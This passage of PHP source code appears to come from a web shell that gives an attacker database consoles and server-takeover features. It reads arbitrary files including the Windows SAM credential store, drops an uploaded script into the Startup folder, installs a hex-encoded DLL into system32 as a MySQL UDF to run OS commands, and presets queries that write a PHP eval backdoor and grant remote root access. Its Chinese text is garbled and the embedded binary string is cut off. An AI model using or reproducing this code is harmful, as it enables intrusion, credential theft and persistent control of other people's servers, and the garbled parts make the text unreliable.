mysql_data_seek($ifxresult, 0);
while ($ifxrow=ifx_fetch_row($ifxresult))
{
echo "<tr>\n";
for ($i=0; $i<ifx_num_fields($ifxresult); $i++ )
{echo '<td>'."$ifxrow[$i]".'</td>';}
echo "</tr>\n";
}
echo "</table></font>";
ifx_free_result($ifxresult);
ifx_close();
}
}
elseif ($db=="db2"){
$db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
$db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
$db2user = isset($_POST['db2user']) ? $_POST['db2user'] : 'root';
$db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '123456';
$db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
$db2action = isset($_POST['action']) ? $_POST['action'] : '';
$db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
$db2query = stripslashes($db2query);
print<<<END
<form method="POST" name="db2form" action="?s=gg&db=db2">
<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br>
<script language="javascript">
function db2Full(i){
Str = new Array(4);
Str[0] = "";
Str[1] = "select schemaname from syscat.schemata;";
Str[2] = "select name from sysibm.systables;";
Str[3] = "select colname from syscat.columns where tabname='table_name';";
Str[4] = "db2 get db cfg for db_name;";
db2form.db2sql.value = Str[i];
return true;
}
</script>
<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
<select onchange="return db2Full(options[selectedIndex].value)">
<option value="0" selected>ִ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
<option value="1"><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD></option>
<option value="1"><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
<option value="2"><EFBFBD>ֶ<EFBFBD></option>
<option value="3"><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
</select>
<input type="hidden" name="action" value="db2query">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($myaction == 'db2query'){
$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
$db2result = db2_exec($db2link,$db2query) or die(db2_stmt_errormsg());
$db2row=db2_fetch_row($db2result);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">'."\n<tr>\n";
for ($i=0; $i<db2_num_fields($db2result); $i++)
{echo '<td><b>'.db2_field_name($db2result)."</b></td>\n";}
echo "</tr>\n";
while ($db2row=db2_fetch_row($db2result))
{
echo "<tr>\n";
for ($i=0; $i<db2_num_fields($db2result); $i++ )
{echo '<td>'."$db2row[$i]".'</td>';}
echo "</tr>\n";
}
echo "</table></font>";
db2_free_result($db2result);
db2_close();
}
}
elseif($db == "fb") {
$fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
$fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
$fbpath = str_replace("\\\\", "\\", $fbpath);
$fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : 'sysdba';
$fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : 'masterkey';
$fbaction = isset($_POST['action']) ? $_POST['action'] : '';
$fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
$fbquery = stripslashes($fbquery);
print<<<END
<form method="POST" name="fbform" action="?s=gg&db=fb">
<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
<script language="javascript">
function fbFull(i){
Str = new Array(5);
Str[0] = "";
Str[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
Str[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
Str[3] = "input 'D:\\createtable.sql';";
Str[4] = "shell netstat -an;";
fbform.fbsql.value = Str[i];
return true;
}
</script>
<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
<select onchange="return fbFull(options[selectedIndex].value)">
<option value="0" selected>ִ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
<option value="1"><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
<option value="2"><EFBFBD>ֶ<EFBFBD></option>
<option value="3"><EFBFBD><EFBFBD><EFBFBD><EFBFBD>sql</option>
<option value="4">shell</option>
</select>
<input type="hidden" name="action" value="fbquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if($fbaction == 'fbquery'){
$fblink = ibase_connect($fbhost.':'.$fbpath,$fbuser,$fbpass) or die(ibase_errmsg());
$fbresult = ibase_query($fblink,$fbquery) or die(ibase_errmsg());
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">'."\n<tr>\n";
for ($i=0; $i<ibase_num_fields($fbresult); $i++)
{echo '<td><b>'.ibase_field_info($fbresult, $i)."</b></td>\n";}
echo "</tr>\n";
ibase_field_info($fbresult, 0);
while ($fbrow=ibase_fetch_row($fbresult))
{
echo "<tr>\n";
for ($i=0; $i<ibase_num_fields($fbresult); $i++ )
{echo '<td>'."$fbrow[$i]".'</td>';}
echo "</tr>\n";
}
echo "</table></font>";
ibase_free_result($fbresult);
ibase_close();
}
}
}
//MySqlִ<6C><D6B4>
function Mysql_n()
{
$MSG_BOX = '';
$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
if(isset($_POST['mhost']) && isset($_POST['muser']))
{
$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
else $MSG_BOX = '<27><><EFBFBD><EFBFBD>MYSQLʧ<4C><CAA7>';
}
$downfile = 'c:/windows/repair/sam';
if(!empty($_POST['downfile']))
{
$downfile = File_Str($_POST['downfile']);
$binpath = bin2hex($downfile);
$query = 'select load_file(0x'.$binpath.')';
if($result = @mysql_query($query,$conn))
{
$k = 0; $downcode = '';
while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
$filedown = basename($downfile);
if(!$filedown) $filedown = 'silic.tmp';
$array = explode('.', $filedown);
$arrayend = array_pop($array);
header('Content-type: application/x-'.$arrayend);
header('Content-Disposition: attachment; filename='.$filedown);
header('Content-Length: '.strlen($downcode));
echo $downcode;
exit;
}
else $MSG_BOX = '<27><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>ʧ<EFBFBD><CAA7>';
}
$o = isset($_GET['o']) ? $_GET['o'] : '';
Root_CSS();
print<<<END
<form method="POST" name="nform" id="nform" action="?s=n&o={$o}" enctype="multipart/form-data">
<center><div class="actall"><a href="?s=n">[MYSQLִ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>]</a>
<a href="?s=n&o=tq">[MYSQL<EFBFBD><EFBFBD>Ȩ]</a>
<a href="?s=n&o=tk">[MYSQL<EFBFBD>ѿⱸ<EFBFBD><EFBFBD>]</a>
<a href="?s=n&o=u">[MYSQL<EFBFBD>ϴ<EFBFBD><EFBFBD>ļ<EFBFBD>]</a>
<a href="?s=n&o=d">[MYSQL<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>]</a></div>
<div class="actall">
<EFBFBD><EFBFBD>ַ <input type="text" name="mhost" value="{$mhost}" style="width:110px">
<EFBFBD>˿<EFBFBD> <input type="text" name="mport" value="{$mport}" style="width:110px">
<EFBFBD>û<EFBFBD> <input type="text" name="muser" value="{$muser}" style="width:110px">
<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input type="text" name="mpass" value="{$mpass}" style="width:110px">
<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input type="text" name="mdata" value="{$mdata}" style="width:110px">
</div>
<div class="actall" style="height:220px;">
END;
if($o=='u')
{
$uppath = 'C:/Documents and Settings/All Users/<2F><><EFBFBD><EFBFBD>ʼ<EFBFBD><CABC><EFBFBD>˵<EFBFBD>/<2F><><EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD>/exp.vbs';
if(!empty($_POST['uppath']))
{
$uppath = $_POST['uppath'];
$query = 'Create TABLE a (cmd text NOT NULL);';
if(@mysql_query($query,$conn))
{
if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
else{$tmp = File_Str(dirname(__FILE__)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
if(@mysql_query($query,$conn))
{
$query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
$MSG_BOX = @mysql_query($query,$conn) ? '<27>ϴ<EFBFBD><CFB4>ļ<EFBFBD><C4BC>ɹ<EFBFBD>' : '<27>ϴ<EFBFBD><CFB4>ļ<EFBFBD>ʧ<EFBFBD><CAA7>';
}
else $MSG_BOX = '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1>ʧ<EFBFBD><CAA7>';
@mysql_query('Drop TABLE IF EXISTS a;',$conn);
}
else $MSG_BOX = '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1>ʧ<EFBFBD><CAA7>';
}
print<<<END
<br><br><EFBFBD>ϴ<EFBFBD>·<EFBFBD><EFBFBD> <input type="text" name="uppath" value="{$uppath}" style="width:500px">
<br><br>ѡ<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD> <input type="file" name="upfile" style="width:500px;height:22px;">
</div><div class="actall"><input type="submit" value="<EFBFBD>ϴ<EFBFBD>" style="width:80px;">
END;
}
elseif($o=='d')
{
print<<<END
<br><br><br><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD> <input type="text" name="downfile" value="{$downfile}" style="width:500px">
</div><div class="actall"><input type="submit" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD>" style="width:80px;">
END;
}elseif($o=='tk'){
if($_POST['dump']=='dump'){
$mysql_link=@mysql_connect($mhost,$muser,$mpass);
mysql_select_db($mdata);
mysql_query("SET NAMES gbk");
$mysql="";
$q1=mysql_query("show tables");
while($t=mysql_fetch_array($q1)){
$table=$t[0];
$q2=mysql_query("show create table `$table`");
$sql=mysql_fetch_array($q2);
$mysql.=$sql['Create Table'].";\r\n\r\n";
$q3=mysql_query("select * from `$table`");
while($data=mysql_fetch_assoc($q3))
{
$keys=array_keys($data);
$keys=array_map('addslashes',$keys);
$keys=join('`,`',$keys);
$keys="`".$keys."`";
$vals=array_values($data);
$vals=array_map('addslashes',$vals);
$vals=join("','",$vals);
$vals="'".$vals."'";
$mysql.="insert into `$table`($keys) values($vals);\r\n";
}
$mysql.="\r\n";
}
$filename=date("Y-m-d-GisA").".sql";
$fp=fopen($filename,'w');
fputs($fp,$mysql);
fclose($fp);
$tip="<br><center><3E><><EFBFBD>ݱ<EFBFBD><DDB1>ݳɹ<DDB3><C9B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD><DDBF>ļ<EFBFBD><C4BC><EFBFBD>[<a href=\"".$filename."\" title=\"<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>\">".$filename."</a>]</center>";
}else{$tip="<EFBFBD><EFBFBD>δ<EFBFBD><EFBFBD><EFBFBD>ݣ<EFBFBD><EFBFBD><EFBFBD>֤<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼<EFBFBD><EFBFBD>д";}
print<<<END
<div class="actall"><form method="post" action="?s=n&o=tk"><br>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ñ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ܣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɷ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :-(<br><br>
{$tip}<br><br>
<input type="hidden" value="dump" name="dump" id="dump">
<input type="submit" value="һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" tilte="Submit" style="width:120px;height:64px;">
</form><div>
END;
}elseif($o=='tq')
{
extract($_POST);
extract($_GET);
$post_sql = $post_sql ? $post_sql : "select state(\"net user\")";
if($install){
$link = mysql_connect ($mhost,$muser,$mpass) or die(mysql_error());
mysql_select_db($mdata,$link) or die(mysql_error());
@mysql_query("DROP TABLE udf_temp", $link);
$query="CREATE TABLE udf_temp (udf BLOB);";
if(!($result=mysql_query($query, $link)))
die('<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1>ʧ<EFBFBD><CAA7>'.mysql_error());
else
{
$code="0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000009BBB9A02DFDAF451DFDAF451DFDAF451A4C6F851DDDAF4515CC6FA51CBDAF45137C5FE518BDAF451DFDAF451DCDAF451BDC5E751DADAF451DFDAF55184DAF45137C5FF51DCDAF45137C5F051DEDAF45152696368DFDAF4510000000000000000504500004C010300B2976A460000000000000000E0000E210B01060000500000001000000090000010E6000000A0000000F000000000001000100000000200000400000000000000040000000000000000000100001000000000000002000000000010000010000000001000001000000000000010000000D8F000007400000000F00000D80000000000000000000000000000000000000000000000000000004CF100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000900000001000000000000000040000000000000000000000000000800000E055505831000000000050000000A000000048000000040000000000000000000000000000400000E055505832000000000010000000F0000000020000004C0000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000322E303200555058210D09020A459475C59FCC587632C900000F46000000B00000260A00BC6FEDDDFF558BEC6AFF6800007148040ED064A10507506489FFD8FF9F2583EC0C5356578965E8C745FC0F7D0C0175236A00FFEDB77B012E05B008FF150970008945E4EB09B81E7363BB0124C38B2FFF000F8B4DF05FF6FFD94E0D5F5E5B8BE55DC20C0090008B442499ACFDF604C740081C100432C0C30F8F58FDAC7D0081EC8C090592C685E8FBFF77DFBD6100B9FF1733C08DBDE90DF3AB66ABAA33DB895DFC8B33DBBBFF450C8338010F85770380480439190A6C53EFFEFFBF80988B50088B0250E80A005DDC83C40885C00F84511A889DC8F6F720276B414EC9F6C785BC0A9FD9DC5D0C16899DC0090FC4D853A1FBF6DF8D8D1A518D95CCFA06528D85B80D500EB399661B2C256C44246CCDF7EFB116288B852A8985ACF605A866EEEE8C6C559C985668050134776723CD95C852240CBFBA8883C9DFDCFFB7FF9CF2AEF7D12BF98BF78BFA8BD1100E4F8BCAC1B3CDFDF6E902F3A50683E103F3A4FBF2083566B604D88B393284B4C1B5DB60E6D8FBB153006A0103FF6B63838A538B20B4283BC3752D6A0A6D84436EF0E8FB1C4F473ADBAF3D7C12516670380B52E917059E0B67B30CF72A18B9D0FA40FB0E72106AD1FA6803FA8D1D93CBD8D84268FF14D0FAC47E0990583A548D64D9BA6F3EE5117E8BF089B564B9535EC803C2993B046AA18BB810CD2ED81B0E567420C63C10FFB9E53B72C6000163E8EBBA1882FBB7B9850436D41105B0596A206A03049D306B6E037D7EB2BF0CF6B171F37B6883FEFF6A85385618DCEFEF2D94F889BD408D4764A80FF652F1DC2F942DB9590C89036A9D5679F8CFBE564F01515030108B13C6043A0009446C03E40BD18B3BD9687E2C089318580C04EB366A64B66C8DC972D031745813594ECE0E53C16551C83BE920FDC91E498B5514890AE98B03E63F61EE23C368C80B6389500C3BD37C2939D8751A3233C07F3001BB709155357A0C83910DBB954511420C8651C8D391AC91AE8D513763F24C9552CDB0069B6CC2A4E96551C51C8B6C76695D530C1FA86CB243C27B0C298B5BA5C3A71B4F08A40F8B400C8674DD5B768C07BC91591B00130BC8AEF1B72C1D750683C8FFC2C30E05DCC030D74E060C74092FF202EDB4329054554468020217F6FEBFFE7134F7D81BC04081C41A5E903D814C060F6808B8640426B073A466121C866DCBB6417B885DA87401A902ADB17EE3D2B76603B58845B71684FEF1888590FFFE7D72BB06563F84BD910AE983CF3F4F9B2E347D942C6A02227175943B5A018CEDF7751616FC1708EC3F79044888FEFE71103BC7751D560A1BC60B6C14326A107A8D74235F61B8E73A52180F66DB8D2C2C88980B531CAE9A338FCA02DD827A1D0E203DB8C9B537DC9004B9827E8B3089CAB4D6D37CB01D80B471D337110CE748BEDDEC6F6A081AA8D177E6489E04A0B6138D55A8E3
$query="INSERT into udf_temp values (CONVERT($code,CHAR));";
if(!mysql_query($query, $link))
{
mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
die('<27><>װdllʧ<6C><CAA7>'.mysql_error());
}
else
{
$dllname = "mysqlDll.dll";
if(file_exists("c:\\windows\\system32\\")) $dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll";
elseif(file_exists("c:\\winnt\\system32\\")) $dir="c:\\\\winnt\\\\system32\\\\mysqlDll.dll";
if(file_exists($dir)) {
$time = time();
$dir = str_replace("mysqlDll","mysqlDll_$time",$dir);
$dllname = str_replace("mysqlDll","mysqlDll_$time",$dllname);
}
$query = "SELECT udf FROM udf_temp INTO DUMPFILE '".$dir."';" ;
if(!mysql_query($query, $link))
{
die("<EFBFBD><EFBFBD>װʧ<EFBFBD><EFBFBD>:$dir<69><72>Ȩ".mysql_error());
}
else
{
echo '<font style=font:11pt color=ff0000>'.$dir.'<27><>װ<EFBFBD>ɹ<EFBFBD></font><br>';
}
}
mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
$result = mysql_query("Create Function state returns string soname '$dllname'", $link) or die(mysql_error());
if($result) {
echo "<EFBFBD>ɹ<EFBFBD><br><a href='?'><3E><><EFBFBD><EFBFBD></a>";
exit();
}
}
}
$ss=stripslashes($post_sql);
print<<<END
<form method="post" action="?s=n&o=tq">
<textarea name="post_sql" style="width:700px;height:200px;">{$ss}</textarea><br>
<input name="install" type="submit" value="<EFBFBD><EFBFBD>װDLL<EFBFBD><EFBFBD><EFBFBD><EFBFBD>"> <input name="" type="submit" value="ִ<EFBFBD><EFBFBD>CMD<EFBFBD><EFBFBD><EFBFBD><EFBFBD>"><br></form>
END;
if ($_POST[post_sql]) {
$link = mysql_connect ($mhost,$muser,$mpass) or die(mysql_error());
if($mdata) mysql_select_db($mdata,$link) or die(mysql_error());
$query = stripslashes($post_sql);
$result = mysql_query($query, $link) or die(mysql_error());
echo "<br><textarea name=\"post_sql\" style=\"width:700px;height:200px;\">";
echo ($result) ? "Done:$result\n\n" : "error:$result\n\n ".mysql_error();
while ($row = @mysql_fetch_array ($result)) {
print_r ($row);
}
}
echo "</textarea>";
}
else
{
if(!empty($_POST['msql']))
{
$msql = $_POST['msql'];
if($result = @mysql_query($msql,$conn))
{
$MSG_BOX = <><D6B4>SQL<51><4C><EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD><br>';
$k = 0;
while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
}
else $MSG_BOX .= mysql_error();
}
print<<<END
<script language="javascript">
function nFull(i){
Str = new Array(11);
Str[0] = "select version();";
Str[1] = "select load_file(0x633A5C5C626F6F742E696E69) FROM user into outfile 'D://a.txt'";
Str[2] = "select '<?php eval(\$_POST[cmd]);?>' into outfile 'F://a.php';";
Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
nform.msql.value = Str[i];
return true;
}
</script>
<textarea name="msql" style="width:700px;height:200px;">{$msql}</textarea></div>
<div class="actall">
<select onchange="return nFull(options[selectedIndex].value)">
<option value="0" selected><EFBFBD><EFBFBD>ʾ<EFBFBD></option>
<option value="1"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD></option>
<option value="2">д<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD></option>
<option value="3"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
</select>
<input type="submit" value="ִ<EFBFBD><EFBFBD>" style="width:80px;">
END;
}
if($MSG_BOX != '') echo '</div><div class="actall">'.$MSG_BOX.'</div></center></form>';
else echo '</div></center></form>';
return true;
}
//MYSQL<51><4C><EFBFBD><EFBFBD>
function Mysql_Len($data,$len)
{
if(strlen($data) < $len) return $data;
return substr_replace($data,'...',$len);
}
function Mysql_Msg()
{
$conn = @mysql_connect($_COOKIE['m_silichost'].':'.$_COOKIE['m_silicport'],$_COOKIE['m_silicuser'],$_COOKIE['m_silicpass']);
if($conn)
{
print<<<END
<script language="javascript">
function Delok(msg,gourl)
{
smsg = "ȷ<EFBFBD><EFBFBD>Ҫɾ<EFBFBD><EFBFBD>[" + unescape(msg) + "]<5D><>?";
if(confirm(smsg)){window.location = gourl;}
}
function Createok(ac)
{
if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (spider BLOB);';
if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
return false;
}
</script>
END;
$BOOL = false;
$MSG_BOX = '<27>û<EFBFBD>:'.$_COOKIE['m_silicuser'].' &nbsp;&nbsp;&nbsp;&nbsp; <20><>ַ:'.$_COOKIE['m_silichost'].':'.$_COOKIE['m_silicport'].' &nbsp;&nbsp;&nbsp;&nbsp; <20>汾:';
$k = 0;
$result = @mysql_query('select version();',$conn);
while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
echo '<div class="actall"> <20><><EFBFBD>ݿ<EFBFBD>:';
$result = mysql_query("SHOW DATABASES",$conn);
while($db = mysql_fetch_array($result)){echo '&nbsp;&nbsp;[<a href="?s=r&db='.$db['Database'].'">'.$db['Database'].'</a>]';}
echo '</div>';
if(isset($_GET['db']))
{
mysql_select_db($_GET['db'],$conn);
if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? <>гɹ<D0B3>' : <><D6B4>ʧ<EFBFBD><CAA7> '.mysql_error();}
if(is_array($_POST['insql']))
{
$query = 'INSERT INTO '.$_GET['table'].' (';
foreach($_POST['insql'] as $var => $key)
{
$querya .= $var.',';
$queryb .= '\''.addslashes($key).'\',';
}
$query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');';
$MSG_BOX = mysql_query($query,$conn) ? '<27><><EFBFBD>ӳɹ<D3B3>' : '<27><><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7> '.mysql_error();
}
if(is_array($_POST['upsql']))
{
$query = 'UPDATE '.$_GET['table'].' SET ';
foreach($_POST['upsql'] as $var => $key)
{
$queryb .= $var.'=\''.addslashes($key).'\',';
}
$query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';';
$MSG_BOX = mysql_query($query,$conn) ? '<27>޸ijɹ<C4B3>' : '<27>޸<EFBFBD>ʧ<EFBFBD><CAA7> '.mysql_error();
}
if(isset($_GET['del']))
{
$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn);
$good = mysql_fetch_assoc($result);
$query = 'DELETE FROM '.$_GET['table'].' WHERE ';
foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';}
$where = $query.substr($queryc, 0, -4).';';
$MSG_BOX = mysql_query($where,$conn) ? <><C9BE><EFBFBD>ɹ<EFBFBD>' : <><C9BE>ʧ<EFBFBD><CAA7> '.mysql_error();
}
$action = '?s=r&db='.$_GET['db'];
if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? <><C9BE><EFBFBD>ɹ<EFBFBD>' : <><C9BE>ʧ<EFBFBD><CAA7> '.mysql_error();}
if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];}
if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert'];
echo '<div class="actall"><form method="POST" action="'.$action.'">';
echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">'.$_POST['nsql'].'</textarea> ';
echo '<input type="submit" name="querysql" value="ִ<><D6B4>" style="width:60px;height:49px;"> ';
echo '<input type="button" value="<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" style="width:60px;height:49px;" onclick="Createok(\'a\')"> ';
echo '<input type="button" value="<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" style="width:60px;height:49px;" onclick="Createok(\'b\')"> ';
echo '<input type="button" value="ɾ<><C9BE><EFBFBD><EFBFBD>" style="width:60px;height:49px;" onclick="Createok(\'c\')"></form></div>';
echo '<div class="msgbox" style="height:40px;">'.$MSG_BOX.'</div><div class="actall"><a href="?s=r&db='.$_GET['db'].'">'.$_GET['db'].'</a> ---> ';
if(isset($_GET['table']))
{
echo '<a href="?s=r&db='.$_GET['db'].'&table='.$_GET['table'].'">'.$_GET['table'].'</a> ';
echo '[<a href="?s=r&db='.$_GET['db'].'&insert='.$_GET['table'].'"><3E><><EFBFBD><EFBFBD></a>]</div>';
if(isset($_GET['edit']))
{
if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table'];
echo '<form method="POST" action="?s=r&db='.$_GET['db'].'&table='.$atable.'">';
$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn);
$good = mysql_fetch_assoc($result);
$u = 0;
foreach($good as $var => $key)
{
$queryc .= $var.'=\''.$key.'\' AND ';
$type = @mysql_field_type($result, $u);
$len = @mysql_field_len($result, $u);
echo '<div class="actall">'.$var.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="upsql['.$var.']" style="width:600px;height:60px;">'.htmlspecialchars($key).'</textarea></div>';
$u++;
}
$where = 'WHERE '.substr($queryc, 0, -4);
echo '<input type="hidden" id="wherevar" name="wherevar" value="'.base64_encode($where).'">';
echo '<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>';
}
else
{
$query = 'SHOW COLUMNS FROM '.$_GET['table'];
$result = mysql_query($query,$conn);
$fields = array();
$row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn));
if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20;
echo '<table border="0"><tr>';
echo '<td class="toptd" style="width:70px;" nowrap><3E><><EFBFBD><EFBFBD></td>';
while($row = @mysql_fetch_assoc($result))
{
array_push($fields,$row['Field']);
echo '<td class="toptd" nowrap>'.$row['Field'].'</td>';
}
echo '</tr>';
if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';
$result = mysql_query($query,$conn);
$v = $p;
while($text = @mysql_fetch_assoc($result))
{
echo '<tr><td><a href="?s=r&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&edit='.$v.'"> <20>޸<EFBFBD> </a> ';
echo '<a href="#" onclick="Delok(\'<27><>\',\'?s=r&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&del='.$v.'\');return false;"> ɾ<><C9BE> </a></td>';
foreach($fields as $row){echo '<td>'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'</td>';}
echo '</tr>'."\r\n";$v++;
}
echo '</table><div class="actall">';
for($i = 1;$i <= ceil($row_num / 20);$i++){$k = ((int)$_GET['p'] == $i) ? '<font color="#FF0000">'.$i.'</font>' : $i;echo '<a href="?s=r&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$i.'">['.$k.']</a> ';}
echo '</div>';
}
}
elseif(isset($_GET['insert']))
{
echo '<a href="?s=r&db='.$_GET['db'].'&table='.$_GET['insert'].'">'.$_GET['insert'].'</a></div>';
$result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn);
$fieldnum = @mysql_num_fields($result);
